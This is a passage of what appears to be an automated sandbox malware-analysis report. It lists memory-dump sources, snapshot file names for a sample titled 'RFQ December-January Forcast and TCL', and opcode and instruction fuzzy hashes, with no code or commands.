                                                                                                            • Instruction Fuzzy Hash: 45519174E002189FDB14DFA9D990A9DBBB2FF89300F208169D849BB354DB316986CF50
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e0c8f5208fc6aede434ecd092b6a89f2d601a6232a7020682202fa24942286e0
                                                                                                            • Instruction ID: 39a76a0bc3383075dcf2d6b9ebcb5e7db35c7d036f69eaacfb752d9f505b4730
                                                                                                            • Opcode Fuzzy Hash: e0c8f5208fc6aede434ecd092b6a89f2d601a6232a7020682202fa24942286e0
                                                                                                            • Instruction Fuzzy Hash: E951A474E11209DFCB18DFA9D59499DBBB2FF89314B208069E819BB364DB35A942CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b36818d25e33c338fe2e4c3883612af9faa8ac27a763facea4ab2baa219b7922
                                                                                                            • Instruction ID: 2ad95db684c1c2e76ce897e451b1a132b3e9cee0047e48fe748564946f055fb1
                                                                                                            • Opcode Fuzzy Hash: b36818d25e33c338fe2e4c3883612af9faa8ac27a763facea4ab2baa219b7922
                                                                                                            • Instruction Fuzzy Hash: 5351BD74E02228CFDB64DF64D984AEDBBB1BB49305F1055AAD409BB350DB35AE82CF40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3d42dc9687ea0c73544ae83f3f452289b05123f7e2f8011e8cb1280aee7c785c
                                                                                                            • Instruction ID: a80721ee165a4a42370d0624d6b3bc8563cadf29182beca88182e1ef3f19078d
                                                                                                            • Opcode Fuzzy Hash: 3d42dc9687ea0c73544ae83f3f452289b05123f7e2f8011e8cb1280aee7c785c
                                                                                                            • Instruction Fuzzy Hash: F751A031A04259DFCF19CFA4C894ADDBFB2BF49310F048166E8259F6A1D331E995CBA0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e6a3e302f26dd3099fc472f0e23fbd9829b75c0a859f61b84bf001f9fd402569
                                                                                                            • Instruction ID: a121d9b829533d07e4d17fbc3fc96082c65d4a78eb8c8d8ec7f164c416c16bc7
                                                                                                            • Opcode Fuzzy Hash: e6a3e302f26dd3099fc472f0e23fbd9829b75c0a859f61b84bf001f9fd402569
                                                                                                            • Instruction Fuzzy Hash: 5631A3312041499FCF099F64D855AEE3BA2FF89704F004025F9159B295CB35DEA2DFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de5831922003a2731694081455022f7d039d44fdc24700c2df64449de8fea1b5
                                                                                                            • Instruction ID: 7830d0bf8ecd64d18a7501899c4df29313556bbe78609cb8701ce3e5b6752dfe
                                                                                                            • Opcode Fuzzy Hash: de5831922003a2731694081455022f7d039d44fdc24700c2df64449de8fea1b5
                                                                                                            • Instruction Fuzzy Hash: 0831CF30604205DFCB15CF28D8809EEBBB2FF89320F10C5A6E844CB215DB31E966CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2772585f4b776a058ecfaa2df0c5c90a7182a4df719f958c9cd6b521c6242625
                                                                                                            • Instruction ID: c924b70e86bd50efb6862edfd045b5db58d35e6a0e7fe8283ae012485b4e9d67
                                                                                                            • Opcode Fuzzy Hash: 2772585f4b776a058ecfaa2df0c5c90a7182a4df719f958c9cd6b521c6242625
                                                                                                            • Instruction Fuzzy Hash: 70319474B043158BDB28DF76D8606AEBFF59F48780F10442DD546A7280EB35E846CFA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a0fb1ae85bbc319dbc1049b8a2b3b636acfb631914b587a0dd53a7c173a9b088
                                                                                                            • Instruction ID: e6acce88e7665595414578e2ed39759f0bd499571f94afd9a6c7e68d78c36f72
                                                                                                            • Opcode Fuzzy Hash: a0fb1ae85bbc319dbc1049b8a2b3b636acfb631914b587a0dd53a7c173a9b088
                                                                                                            • Instruction Fuzzy Hash: DC21C1313083014BDB1D5625D894ABA26A6AFCA759B148439F406CB7D8EB36CCC293D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 1b5e48b76e9a2f27555fef96dbe6f98c9a4e107ffb4c6f1a48d717067f4ba643
                                                                                                            • Instruction ID: 299bf587f68c201dd0f36d898252b839519076a990dbf8c9f680d28c328ef103
                                                                                                            • Opcode Fuzzy Hash: 1b5e48b76e9a2f27555fef96dbe6f98c9a4e107ffb4c6f1a48d717067f4ba643
                                                                                                            • Instruction Fuzzy Hash: A0315A78B003198BDB19DF7AC4546ADBFF6AF88205F14852AC906EB390DF349942CF52
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5059d94988f466ddd45ec3db4be98d830303bcca35887eadb571aaf46c4096a6
                                                                                                            • Instruction ID: 4dea2212f71f5276dec963e80155038df975e60e063f6c1ebc9ee27981284bad
                                                                                                            • Opcode Fuzzy Hash: 5059d94988f466ddd45ec3db4be98d830303bcca35887eadb571aaf46c4096a6
                                                                                                            • Instruction Fuzzy Hash: CB317A30C14609DECB00EFB8E8586EDBBB0FF4A301F009625E40977110EB31AA9ACB41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 4ed6c7abb40b5d612adb0852408d9deceb39e498c5dbb5e25dba38370bbc5a7e
                                                                                                            • Instruction ID: e37f392bb357e47952404b15a0919c7ee4bb27a88ae7c52ba5dac57fde8e04d1
                                                                                                            • Opcode Fuzzy Hash: 4ed6c7abb40b5d612adb0852408d9deceb39e498c5dbb5e25dba38370bbc5a7e
                                                                                                            • Instruction Fuzzy Hash: 7E21A371A0010AAFCB28DF24C4509EE77A5EB99754B10C029D95DAB240EB35EE47CBD2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 544a8b1dce7d6729f3b514cf3bd0c612ca85220fc67c0c7332dd27cc308aaa42
                                                                                                            • Instruction ID: 84ee82860a61cd07ec2e84f817e8b4df7e985796f4d2b124623a21b8527a2dcb
                                                                                                            • Opcode Fuzzy Hash: 544a8b1dce7d6729f3b514cf3bd0c612ca85220fc67c0c7332dd27cc308aaa42
                                                                                                            • Instruction Fuzzy Hash: 1C21F675E047518BD728CB76C4606EEBFF6AF88340F50842DD546A7280DB31A946CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2904f17afd8dd0ee71e41077ec8ca7450be0d9fcd5cce7834cd975fd1f8f9155
                                                                                                            • Instruction ID: c193a73074e10685bf22fcbfa4effdb68a80a7e260bb8e7067e4d8a71f57803a
                                                                                                            • Opcode Fuzzy Hash: 2904f17afd8dd0ee71e41077ec8ca7450be0d9fcd5cce7834cd975fd1f8f9155
                                                                                                            • Instruction Fuzzy Hash: D621DE31304A12CFC72C9B2AD89496EB7A2BFC97947154139E826DB754CF70DC428BD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2183329b1d0c0f684b396c3a9e4bdd45bc9a46489d0b47f4c39f85876b6a2725
                                                                                                            • Instruction ID: 88f6dc004c505f2f299fe4f3a0e7342daa66e73dd2143e49d377b869655e2a04
                                                                                                            • Opcode Fuzzy Hash: 2183329b1d0c0f684b396c3a9e4bdd45bc9a46489d0b47f4c39f85876b6a2725
                                                                                                            • Instruction Fuzzy Hash: 3521F270D02329DFEB04CFA5D4587EEBBB2AF89304F509429D415BB240DB745A4ACF51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2969775619.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_ad000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8277c2b0d2ac6f2f533bad8e9e4b08b3b7c136f8f1b29ef42cd11b4517a37aff
                                                                                                            • Instruction ID: b4309149b324b62881447ab1b545cf6e7b3f5bd22f24115e9025ad46a55b6080
                                                                                                            • Opcode Fuzzy Hash: 8277c2b0d2ac6f2f533bad8e9e4b08b3b7c136f8f1b29ef42cd11b4517a37aff
                                                                                                            • Instruction Fuzzy Hash: BB2125B1604200EFCB10DF94D9C0F26BBA1EB85314F24C56ED94A0B642C336D847CB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9f75d2cf502a560a11f1383fd759273b1be1367db2e2b87201e7d41e5b6abe4d
                                                                                                            • Instruction ID: f90e25a20e1e36481c32d1455354a381c78cc39fe51067456394fcae07b2917c
                                                                                                            • Opcode Fuzzy Hash: 9f75d2cf502a560a11f1383fd759273b1be1367db2e2b87201e7d41e5b6abe4d
                                                                                                            • Instruction Fuzzy Hash: F021A170E052099FDB09EFB9C4116EEB7B2EF8A305F1084BAD444AB295DBB45D86CF41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: bb42d398624634f9b5b4150d1f023a4427f157b9231f55d1f4d02a96d9ab581d
                                                                                                            • Instruction ID: 5480f0f7c6730127e264d60c5e7ea41e1d09935a7fb225d94b55b019c92a2632
                                                                                                            • Opcode Fuzzy Hash: bb42d398624634f9b5b4150d1f023a4427f157b9231f55d1f4d02a96d9ab581d
                                                                                                            • Instruction Fuzzy Hash: 84213678E0421A8FDB01DFA4D9546EEBFB1EB49301F10896AD404B7260DB354A4ACF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5e191f002a3d6590408c9127fcdab284ff03de14500aae391f0d1f9c53e94d10
                                                                                                            • Instruction ID: 6ae64849406e42b2e68160cf05706df59981aba5353c69375cab39780f117635
                                                                                                            • Opcode Fuzzy Hash: 5e191f002a3d6590408c9127fcdab284ff03de14500aae391f0d1f9c53e94d10
                                                                                                            • Instruction Fuzzy Hash: 982101312081499FCB18AF64D8556EE3BA1EB8A708F004039F8059B259CB35DEA1DBE0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 23c3fe4f0e690b33dca9d603fd848aff5c14e0a5357c09c242c3f1e698208689
                                                                                                            • Instruction ID: fedce09da103a79bfbdb4b9542eb1f3c9dc3f3bd10ded51f6d2a5530c529c972
                                                                                                            • Opcode Fuzzy Hash: 23c3fe4f0e690b33dca9d603fd848aff5c14e0a5357c09c242c3f1e698208689
                                                                                                            • Instruction Fuzzy Hash: 5031A674E11309DFCB58DFA8D59489DBBB2FF49305B208069E819AB364DB32AD46CF41
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 007d4edd62fe1bd13a81ebfa761d4d475f0b22769cf1e872ee40819bc8770bb1
                                                                                                            • Instruction ID: 80e2e02973d4c15fd67f79c69235bc1cd9a3fea0a1bcfb6d82e4e0ceba241a68
                                                                                                            • Opcode Fuzzy Hash: 007d4edd62fe1bd13a81ebfa761d4d475f0b22769cf1e872ee40819bc8770bb1
                                                                                                            • Instruction Fuzzy Hash: C5211674D0524A8FCB06DFB9D8445EEBFF0EF0A300F0541AAD445BB261EB305A86CBA1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3fa73e81ffac68cc9abbaaaf7745c929114a822c3924b8e94dd2364ec960ebef
                                                                                                            • Instruction ID: 79bdc125c85ce8c841d9fe8e63424d721bc74f8fb1472cd9f462bf3d89f9f849
                                                                                                            • Opcode Fuzzy Hash: 3fa73e81ffac68cc9abbaaaf7745c929114a822c3924b8e94dd2364ec960ebef
                                                                                                            • Instruction Fuzzy Hash: 51214C74E012499FCB09CFA5D540AEEBFB6AF48311F248069E416B6290DB35EA81DF60
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 522344ad890daceb1d375a7a0ebfd79a443ce42f58f0ee8a4095248bd7640b43
                                                                                                            • Instruction ID: 50042813cc22f2336805996b6ea1c121b964476da9d8f24a8c8e1471fa927e91
                                                                                                            • Opcode Fuzzy Hash: 522344ad890daceb1d375a7a0ebfd79a443ce42f58f0ee8a4095248bd7640b43
                                                                                                            • Instruction Fuzzy Hash: 9411BF31309A11CFC71D9B2AD89496E7BA2BFC979031901B9E416DB761CF71DC428B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: acc4b22e476233d31730d234fe84eafd12e4565360e5ea84f2c44bad18b3a67b
                                                                                                            • Instruction ID: 9b27715e1761e44765bae9910b5c40fc8d3f8ebb7a7beba34814189cecd26087
                                                                                                            • Opcode Fuzzy Hash: acc4b22e476233d31730d234fe84eafd12e4565360e5ea84f2c44bad18b3a67b
                                                                                                            • Instruction Fuzzy Hash: A32134B4E05209DFDB04DFA8D584AADBBF0BF0A300F0084AAD415AB361DB349E85DF91
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5fd5ea2e841ffb2c5edbf12dfdb78df4dd05e91ab564b6e13e24613eceb66076
                                                                                                            • Instruction ID: c81539910c2564b77d371d08b0a9a8b48d2aae7ce6a456d1bbb36c3a912e1b30
                                                                                                            • Opcode Fuzzy Hash: 5fd5ea2e841ffb2c5edbf12dfdb78df4dd05e91ab564b6e13e24613eceb66076
                                                                                                            • Instruction Fuzzy Hash: 2F114436B083515FD7159B35889866F7BE6BF8531431448BDD849C7220FF61CC028792
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b4c50e450b07e8d5306991ff94139a29c797c9125343c4245f540650e9488345
                                                                                                            • Instruction ID: 3d2bcd843d35d9b2e52aa8f8bc0d7cd0d46fee743163dd5589376b04ff985523
                                                                                                            • Opcode Fuzzy Hash: b4c50e450b07e8d5306991ff94139a29c797c9125343c4245f540650e9488345
                                                                                                            • Instruction Fuzzy Hash: BD211478E0021ADFDB00DFA5D9546EEBBB1FB88301F109969D415B3360DB755A86CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 653b51b3429438865cb147c2366bfbc15007ea10659da04bb3bff6c4609bfdcb
                                                                                                            • Instruction ID: 2ad787152e02628b65cf1ce79a2b97b76234b3dd3d65b0ef01b28004675bd420
                                                                                                            • Opcode Fuzzy Hash: 653b51b3429438865cb147c2366bfbc15007ea10659da04bb3bff6c4609bfdcb
                                                                                                            • Instruction Fuzzy Hash: 5B211478E0021ADFDB00DFA5D9546EEBBB1FB88301F109969D415B3360DB755A86CF90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 44efa243853fb6beb3d6c2cca6eeb500acd05c498a47b2b234f55a60d4560562
                                                                                                            • Instruction ID: eb4cf9efe2b1b32940861f13165b962c61cd7c54c344b2b6d233ec51fb135b5f
                                                                                                            • Opcode Fuzzy Hash: 44efa243853fb6beb3d6c2cca6eeb500acd05c498a47b2b234f55a60d4560562
                                                                                                            • Instruction Fuzzy Hash: 06018576E083649FEB219B688C0026E7FB1FB85314F00016FD8048B642D771A60BCF92
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2969775619.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_ad000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 369630bcfbb8dc2354fa39a610b9a4a4152f78477c6cdd78f3ce479ca549ff51
                                                                                                            • Instruction ID: f9101b157d7983b876cdfae578f33f58d7bce4c2ad6f1cd61ab7f696c049c08e
                                                                                                            • Opcode Fuzzy Hash: 369630bcfbb8dc2354fa39a610b9a4a4152f78477c6cdd78f3ce479ca549ff51
                                                                                                            • Instruction Fuzzy Hash: CB11BB75504280DFCB11CF54D5C4B15BBB2FB85324F28C6AAD84A4BA56C33AD84ACB62
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc6a1c27ac71c99875dc05b20dfc6492d73970dafdad941cf22966f0311a9579
                                                                                                            • Instruction ID: f7f6e1b9f1e133727390ac618e65f815366a3de14a461da94521f37fd99d3591
                                                                                                            • Opcode Fuzzy Hash: cc6a1c27ac71c99875dc05b20dfc6492d73970dafdad941cf22966f0311a9579
                                                                                                            • Instruction Fuzzy Hash: 1001F5327051546FCB069EA49850AEF3BE6EBC9740B188069F505D7291CB718D469B90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2992864771.0000000036B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 36B00000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_36b00000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 04877269c1e08278ac589345b440d454738b4d73e2fc52e76b6ee490ff2e1b6e
                                                                                                            • Instruction ID: 258ab34e4035f5383438c9d063edfb1d7e6725348a58b9098f0c62e18c556774
                                                                                                            • Opcode Fuzzy Hash: 04877269c1e08278ac589345b440d454738b4d73e2fc52e76b6ee490ff2e1b6e
                                                                                                            • Instruction Fuzzy Hash: 3A018C38D112088BDB01DFB5D8546EDBFB1EB8B302FA0A429C404A3261DB355912CF61
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c2b208762305933054866e109d5670cf2b3dc0e22abef6a6e10a9556e0b1b3ef
                                                                                                            • Instruction ID: 2c0f47f44f9853f058e0afb11e3a645ecc2bfbe8c17ce7101f1752c6fa24a761
                                                                                                            • Opcode Fuzzy Hash: c2b208762305933054866e109d5670cf2b3dc0e22abef6a6e10a9556e0b1b3ef
                                                                                                            • Instruction Fuzzy Hash: 1D01D136B143115BEB18AB79888866F76EBBFC46643148839D809C7220FF70CD428792
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 17c121b62a708aa1ba8e40e879edb64ab068e32bc8819c7b2e080b8b2412e342
                                                                                                            • Instruction ID: 6e03b56ecd5da1e8e5d12dcce0637e1a1f71e612d8530504cbece36971b34627
                                                                                                            • Opcode Fuzzy Hash: 17c121b62a708aa1ba8e40e879edb64ab068e32bc8819c7b2e080b8b2412e342
                                                                                                            • Instruction Fuzzy Hash: 5901DF363081059FCB0DAF64D8945ED7BA2EF8A714B008039F916DB265DB35CE62DB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000004.00000002.2970021636.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_4_2_110000_RFQ December-January Forcast and TCL.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 976d871d21ed9763d8d41c0851e299c2f9deac01b79470da2c9f8803a8948279
                                                                                                            • Instruction ID: 0d37de5b4db46beebddaf9aa583161e148a8178a1f43a6b08f59924f47acd2c6
                                                                                                            • Opcode Fuzzy Hash: 976d871d21ed9763d8d41c0851e299c2f9deac01b79470da2c9f8803a8948279
                                                                                                            • Instruction Fuzzy Hash: B1014675A01208DFDB088FB5D958AEDBBB2FB8A301F505439DA11B2350CB76898BDF54
                                                                                                            Memory Dump Source
